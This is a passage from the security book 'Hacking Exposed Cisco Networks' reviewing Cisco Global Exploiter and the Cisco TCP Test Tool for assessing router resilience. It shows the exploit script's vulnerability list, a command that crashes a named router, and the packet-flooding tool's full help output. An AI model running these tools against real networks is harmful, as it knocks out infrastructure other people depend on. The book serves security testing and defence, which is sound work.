CISCO DOS ASSESSMENT TOOLS

Several tools capable of launching Cisco-centric DoS attacks are freely available for download on the Internet. A vigilant system administrator or a penetration tester can employ them to test her own or the client's network to evaluate its resilience to DoS attacks that can be potentially launched by crackers. In this section, we review two such tools that are useful for launching a variety of DoS attacks against Cisco boxes.

Cisco Global Exploiter

Attack 

Popularity:

7

Simplicity:

8

Impact:

8

Risk Rating:

8

Cisco Global Exploiter (CGE) is a powerful Perl script that can be used to attack and thus assess the patch level of Cisco devices. At the time of writing, it includes built-in information about 14 vulnerabilities. The best part about this tool is that it allows easy addition of new security flaws. With a trivial knowledge of Perl, you can update and customize the vulnerability database of the tool to represent the best testing scenario for the network. This framework can be downloaded from http://www.packetstormsecurity.org/ by searching for cge . The default CGE can exploit the following bugs in Cisco devices:

 arhontus $ perl cge.pl      Usage :      perl cge.pl <target> <vulnerability number>      Vulnerabilities list :      [1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability      [2] - Cisco IOS Router Denial of Service Vulnerability      [3] - Cisco IOS HTTP Auth Vulnerability      [4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability      [5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability      [6] - Cisco 675 Web Administration Denial of Service Vulnerability      [7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability      [8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability      [9] - Cisco 514 UDP Flood Denial of Service Vulnerability      [10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability      [11] - Cisco Catalyst Memory Leak Vulnerability      [12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability      [13] - 0 Encoding IDS Bypass Vulnerability (UTF)      [14] - Cisco IOS HTTP Denial of Service Vulnerability 

With the successful exploitation of a Cisco device, you should see output similar to this:

 arhontus $ perl cge.pl 2611b 2      Packet sent ...      Now checking server's status ...      Vulnerability successful exploited. Target server is down ... 

2611b is the name or IP address of the target, and 2 is the vulnerability number; in this particular example it refers to Cisco IOS Router DoS Vulnerability, in which an invalid HTTP request is sent to the router's web management interface.

After upgrading to the latest IOS version, we run the same exploit to check whether the router has been successfully patched for this bug. As you can see, the vulnerability no longer crashes the server:

 arhontus $ perl cge.pl 2611b 2      Packet sent ...      Now checking server's status ...      Vulnerability unsuccessful exploited. Target server is still up ... 

Cisco TCP Test Tool

Attack 

Popularity:

4

Simplicity:

6

Impact:

7

Risk Rating:

6

The TCP Test Tool was written by the Cisco development team (Critical Infrastructure Assurance Group, or CIAG) to perform security assessments on Cisco devices. It allows the user to craft and send customized TCP packets with any payload. This tool has inherited many of the ideas of the Nemesis packet-construction project. As you can see, a vast amount of options is available to the user to create a firm testing environment. The TCP Test Tool (ttt) can be obtained from the Cisco Systems web site or from http://www.packetstormsecurity.org.

 arhontus $ ./ttt --help      TCP Test Tool (ttt) Version 1.3      Eloy Paris <elparis@cisco.com>      From ideas by Sean Convery <sean@cisco.com> and the NEMESIS Project      Usage: ttt [-h] [options]      General options:        -h, --help                     display this help and exit        -c, --count NUM                number of segments to send (default is 1)        -d, --delay NUM                delay in milliseconds (default is 0)            --flood NUM                 flood the network by sending NUM packets      TCP options:        -x, --sport NUM                TCP source port        -y, --dport NUM                TCP destination port        -f, --tcpflags                  TCP flags            -fS SYN, -fA ACK, -fR RST, -fP PSH, -fF FIN, -fU URG           (can also use --syn, --ack, --rst, --psh, --fin, and --urg)        -w, --window NUM               window size        -s, --sequence NUM             sequence number (^ to increment by window)        -a, --acknowledgement NUM      acknowledgement number        -u, --urgent NUM               urgent pointer        -P, --payload FILE             payload file (use stdin if FILE is '-')        -5, --md5 SECRET               use TCP MD5 signatures (TCP option 19)            --mss NUM                  TCP maximum segment size            --wscale NUM               window scale option            --nocksum                  don't compute TCP checksums      IP options:        -S, --src ADDRESS              source IP address        -D, --dst ADDRESS              destination IP address        -I, --id NUM                   IP ID        -T, --ttl NUM                  IP time to live        -t, --tos NUM                  IP type of service 

This utility can also be used from a scripting platform to generate random payload or specific options, such as BGP bruteforcing, as has been done with tcpsig-crack.pl in the examples directory. An attacker or penetration tester can generate a large amount of testing scenarios with this suite, which are limited only by the user's imagination .



Hacking Exposed Cisco Networks
Hacking Exposed Cisco Networks: Cisco Security Secrets & Solutions
ISBN: 0072259175
EAN: 2147483647
Year: 2005
Pages: 117

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net